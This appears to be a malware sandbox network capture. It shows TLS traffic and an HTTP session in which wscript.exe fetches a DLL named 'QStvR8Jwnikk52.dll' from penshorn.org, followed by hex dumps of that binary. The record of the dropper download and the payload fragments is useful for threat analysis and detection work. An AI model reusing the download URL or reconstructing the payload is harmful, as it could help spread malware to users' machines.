Mar 17, 2023 09:17:40.884608984 CET | 529 | OUT | Data Raw: 17 03 03 00 9b 00 00 00 00 00 00 00 01 9b 5b 6b 28 9b 22 33 8d 1a c3 5f 8e 38 2c fd 9a b3 88 c7 c1 3c 18 f6 f4 6d 14 11 ea 7a 25 eb f7 e8 1a 20 03 3d 34 21 7c e5 e3 0d 18 9b af b7 d1 8a b3 e0 0e 64 97 99 56 08 b5 e1 63 33 ca 38 24 0f f7 53 92 0c
Data Ascii: [k("3_8,<mz% =4!|dVc38$S+@3yBXt^~Mj77Thr_unQavxj]*:
Mar 17, 2023 09:17:42.176580906 CET | 530 | IN | Data Raw: 17 03 03 01 3e 88 43 9e e1 ea 11 bf cb 64 00 d4 a2 a4 a1 84 bb 42 59 73 41 c4 7f 06 99 c8 c5 59 f4 c4 ff 13 0d db d3 f3 2e 96 c6 5a 50 92 19 de 7c 95 af 38 c9 ec 55 2f 77 13 90 68 22 c1 0f 20 d9 04 47 9e a4 2f 9e 78 82 60 eb 36 c5 4c f0 b7 6b 3d
Data Ascii: >CdBYsAY.ZP|8U/wh" G/x`6Lk=E8'7X;PRWJ[6M{$:4m;K~Q}u|`r\h{:MEy]h( %l<+7nJe~a`ducY4
Mar 17, 2023 09:17:45.176423073 CET | 530 | IN | Data Raw: 15 03 03 00 1a 88 43 9e e1 ea 11 bf cc 7d 08 62 a0 53 ce f6 2d 9e 06 d2 6c 33 33 df a3 f4 a5
Data Ascii: C}bS-l33
Mar 17, 2023 09:17:45.493266106 CET | 530 | OUT | Data Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 a3 6e b6 df 6b 26 3f 63 73 c1 e7 9b 0d 12 be ad 4c a8
Data Ascii: nk&?csL


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49683 | 203.26.41.131 | 443 | C:\Windows\SysWOW64\wscript.exe
Timestamp | kBytes transferred | Direction | Data
2023-03-17 08:16:36 UTC | 0 | OUT | GET /admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org
2023-03-17 08:16:37 UTC | 0 | IN | HTTP/1.1 200 OK
Date: Fri, 17 Mar 2023 08:16:36 GMT
Server: Apache
X-Powered-By: PHP/7.0.33
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Expires: Fri, 17 Mar 2023 08:16:36 GMT
Content-Disposition: attachment; filename="QStvR8Jwnikk52.dll"
Content-Transfer-Encoding: binary
Set-Cookie: 641421e4f209f=1679040996; expires=Fri, 17-Mar-2023 08:17:36 GMT; Max-Age=60; path=/
Last-Modified: Fri, 17 Mar 2023 08:16:36 GMT
Connection: close
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
2023-03-17 08:16:37 UTC | 0 | IN | Data Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52
Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
2023-03-17 08:16:37 UTC | 8 | IN | Data Raw: 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3
Data Ascii: DBDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHD
2023-03-17 08:16:37 UTC | 16 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:37 UTC | 16 | IN | Data Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f
Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
2023-03-17 08:16:37 UTC | 24 | IN | Data Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00
Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
2023-03-17 08:16:37 UTC | 32 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:37 UTC | 32 | IN | Data Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b
Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
2023-03-17 08:16:37 UTC | 40 | IN | Data Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d
Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
2023-03-17 08:16:37 UTC | 48 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:37 UTC | 48 | IN | Data Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d
Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
2023-03-17 08:16:37 UTC | 56 | IN | Data Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2
Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
2023-03-17 08:16:37 UTC | 64 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:37 UTC | 64 | IN | Data Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28
Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
2023-03-17 08:16:37 UTC | 72 | IN | Data Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15
Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
2023-03-17 08:16:37 UTC | 80 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:38 UTC | 80 | IN | Data Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff
Data Ascii: 4000HD$ tX$$$HD$ a|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
2023-03-17 08:16:38 UTC | 88 | IN | Data Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00
Data Ascii: @> ?-DT!?AsAA
2023-03-17 08:16:38 UTC | 96 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:38 UTC | 96 | IN | Data Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0
Data Ascii: 40000~@P`pX~x~
2023-03-17 08:16:38 UTC | 104 | IN | Data Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c
Data Ascii: hVxWXY<v
2023-03-17 08:16:38 UTC | 112 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:38 UTC | 112 | IN | Data Raw: 34 30 30 30 0d 0a b8 a6 4e fd 69 9c 3b 3e ab a4 5f 83 a5 6a 2b 3e d1 ed 0f 79 c3 cc 43 3e e0 4f 40 c4 4c c0 29 3e 9d d8 75 7a 4b 73 40 3e 12 16 e0 c4 04 44 1b 3e 94 48 ce c2 65 c5 40 3e cd 35 d9 41 14 c7 33 3e 4e 3b 6b 55 92 a4 72 3d 43 dc 41 03 09 fa 20 3e f4 d9 e3 09 70 8f 2e 3e 45 8a 04 8b f6 1b 4b 3e 56 a9 fa df 52 ee 3e 3e bd 65 e4 00 09 6b 45 3e 66 76 77 f5 9e 92 4d 3e 60 e2 37 86 a2 6e 48 3e f0 a2 0c f1 af 65 46 3e 74 ec 48 af fd 11 2f 3e c7 d1 a4 86 1b be 4c 3e 65 76 a8 fe 5b b0 25 3e 1d 4a 1a 0a c2 ce 41 3e 9f 9b 40 0a 5f cd 41 3e 70 50 26 c8 56 36 45 3e 60 22 28 35 d8 7e 37 3e d2 b9 40 30 bc 17 24 3e f2 ef 79 7b ef 8e 40 3e e9 57 dc 39 6f c7 4d 3e 57 f4 0c a7 93 04 4c 3e 0c a6 a5 ce d6 83 4a 3e ba 57 c5 0d 70 d6 30 3e 0a bd e8 12 6c c9 44 3e 15
Data Ascii: 4000Ni;>_j+>yC>O@L)>uzKs@>D>He@>5A3>N;kUr=CA >p.>EK>VR>>ekE>fvwM>`7nH>eF>tH/>L>ev[%>JA>@_A>pP&V6E>`"(5~7>@0$>y{@>W9oM>WL>J>Wp0>lD>
2023-03-17 08:16:38 UTC | 120 | IN | Data Raw: 00 00 01 00 00 00 91 de 00 00 ce de 00 00 6a 53 01 00 00 00 00 00 19 33 0b 00 25 34 22 00 19 01 1a 00 0e f0 0c e0 0a d0 08 c0 06 70 05 60 04 50 00 00 d0 f8 00 00 a8 c4 01 00 cb 00 00 00 94 d7 00 00 ff ff ff ff 19 2d 09 00 1b 54 90 02 1b 34 8e 02 1b 01 8a 02 0e e0 0c 70 0b 60 00 00 18 f7 00 00 40 14 00 00 19 31 0b 00 1f 54 96 02 1f 34 94 02 1f 01 8e 02 12 f0 10 e0 0e c0 0c 70 0b 60 00 00 18 f7 00 00 60 14 00 00 11 0a 04 00 0a 34 09 00 0a 52 06 70 84 2a 00 00 01 00 00 00 02 e2 00 00 81 e2 00 00 81 53 01 00 00 00 00 00 01 17 0a 00 17 54 0e 00 17 34 0d 00 17 52 13 f0 11 e0 0f d0 0d c0 0b 70 01 0e 02 00 0e 32 0a 30 01 18 06 00 18 54 07 00 18 34 06 00 18 32 14 60 01 04 01 00 04 02 00 00 01 09 01 00 09 42 00 00 01 10 06 00 10 64 09 00 10 34 08 00 10 52 0c 70 11
Data Ascii: jS3%4"p`P-T4p`@1T4p``4Rp*ST4Rp20T42`Bd4Rp
2023-03-17 08:16:38 UTC | 128 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:38 UTC | 128 | IN | Data Raw: 34 30 30 30 0d 0a 66 40 00 00 7c ec 01 00 68 40 00 00 ee 40 00 00 54 eb 01 00 f0 40 00 00 7a 42 00 00 30 ec 01 00 7c 42 00 00 12 43 00 00 14 ea 01 00 14 43 00 00 01 44 00 00 b8 ec 01 00 04 44 00 00 8c 44 00 00 14 ea 01 00 bc 44 00 00 02 45 00 00 e4 e9 01 00 04 45 00 00 3b 45 00 00 e4 e9 01 00 50 45 00 00 68 45 00 00 c8 ed 01 00 70 45 00 00 71 45 00 00 cc ed 01 00 80 45 00 00 81 45 00 00 d0 ed 01 00 bc 45 00 00 0a 47 00 00 d4 ed 01 00 0c 47 00 00 51 47 00 00 e4 e9 01 00 54 47 00 00 9a 47 00 00 e4 e9 01 00 9c 47 00 00 e2 47 00 00 e4 e9 01 00 e4 47 00 00 35 48 00 00 54 eb 01 00 38 48 00 00 99 48 00 00 f0 ea 01 00 b0 48 00 00 f0 48 00 00 f0 ed 01 00 00 49 00 00 2a 49 00 00 f8 ed 01 00 30 49 00 00 56 49 00 00 00 ee 01 00 60 49 00 00 a7 49 00 00 08 ee 01 00 a8
Data Ascii: 4000f@|h@@T@zB0|BCCDDDDEE;EPEhEpEqEEEEGGQGTGGGGG5HT8HHHHI*I0IVI`II
2023-03-17 08:16:38 UTC | 136 | IN | Data Raw: e6 9b ca bb 3e 59 4f b6 31 2c 34 0c 05 c5 b4 6e 0e eb 04 78 f2 31 0e c3 ad 59 3c e3 75 5e dc 4e b4 89 d2 60 e2 4d 1e e5 40 05 5d 43 03 e0 cf 16 57 e2 20 26 f8 6e 0e 24 c1 43 35 1f 34 07 42 d0 79 17 b1 64 2e ed da b7 cc e3 1e 7f f2 d8 36 97 d8 63 3a be 01 14 ef 2e 1a 92 23 2b 71 e3 0c 3c c2 e3 89 e7 fd 3c 43 6f f1 44 2e 4b b5 3d 4c 44 3f 24 d3 ef 70 05 da 63 42 f0 01 2c 5f cc 65 39 54 6e 0e 29 c8 06 4a f5 04 07 92 1a a9 38 bb 64 2e cb 71 77 f4 27 14 5d ec 64 35 fb 16 59 3e cb 44 53 43 2e 1a 02 b6 6e 0e e3 34 3c 04 1a f5 d9 b7 1c 43 e1 75 16 96 07 4b 13 6a 62 6b b8 44 2d a7 5e d2 53 3a ff ef 3b 78 e0 28 46 c8 ca 5a a8 90 aa 36 be b0 91 3f d0 71 17 f1 44 2e 44 b5 3d 4c 45 74 b8 a6 ef 70 05 da 63 6a f0 01 2c 29 c8 65 39 be 5e 0e 40 e2 68 c3 f5 04 07 72 60 ac
Data Ascii: >YO1,4nx1Y<u^N`M@]CW &n$C54Byd.6c:.#+q<<CoD.K=LD?$pcB,_e9Tn)J8d.qw']d5Y>DSC.n4<CuKjbkD-^S:;x(FZ6?qD.D=LEtpcj,)e9^@hr`
2023-03-17 08:16:38 UTC | 144 | IN | Data Raw: 0d 0a
Data Ascii:
2023-03-17 08:16:38 UTC | 144 | IN | Data Raw: 34 30 30 30 0d 0a cf 4a 14 52 1e c1 76 72 ea 75 71 1b 3a bf c4 ad 00 27 cd 16 38 23 e6 fd 1f 76 b2 ae 01 10 7d f7 9d 48 fb 1d 18 48 d3 4d 51 42 f3 0c 17 46 4d e1 61 64 f2 3e 77 0e 84 48 44 53 ef 2f 41 71 c7 3d 71 62 f9 0a 81 b6 97 30 b7 80 fd 0c 14 69 5a c3 40 6c 7b a5 72 58 b6 ef 61 5e 1b d1 a7 f6 ae 55 a1 3f 41 71 85 6b 71 62 41 82 51 50 39 7b bd 2d 18 20 de f8 02 5a f3 0c 17 22 c5 58 61 64 b4 0e 77 66 d2 ab 03 3c e9 0f 41 79 38 aa 35 46 01 e9 46 8b 8e b9 58 7d 7c 6f b1 55 75 02 92 1c f3 92 e0 44 45 24 be 3e 77 6e ad 10 37 52 28 e0 2e 11 77 a0 a1 eb 09 6b be 3f 79 f1 74 75 b7 23 3c a8 19 72 f3 0c 17 22 99 64 61 64 b4 3e 77 66 10 d5 44 53 a9 1f 41 79 9e 86 7b 62 ca 0f 11 34 99 7d 1a 5b 3c 20 b9 23 19 c9 31 f3 4d 60 6b 0f 71 64 c6 75 2c 64 4d 38 54 1b 30
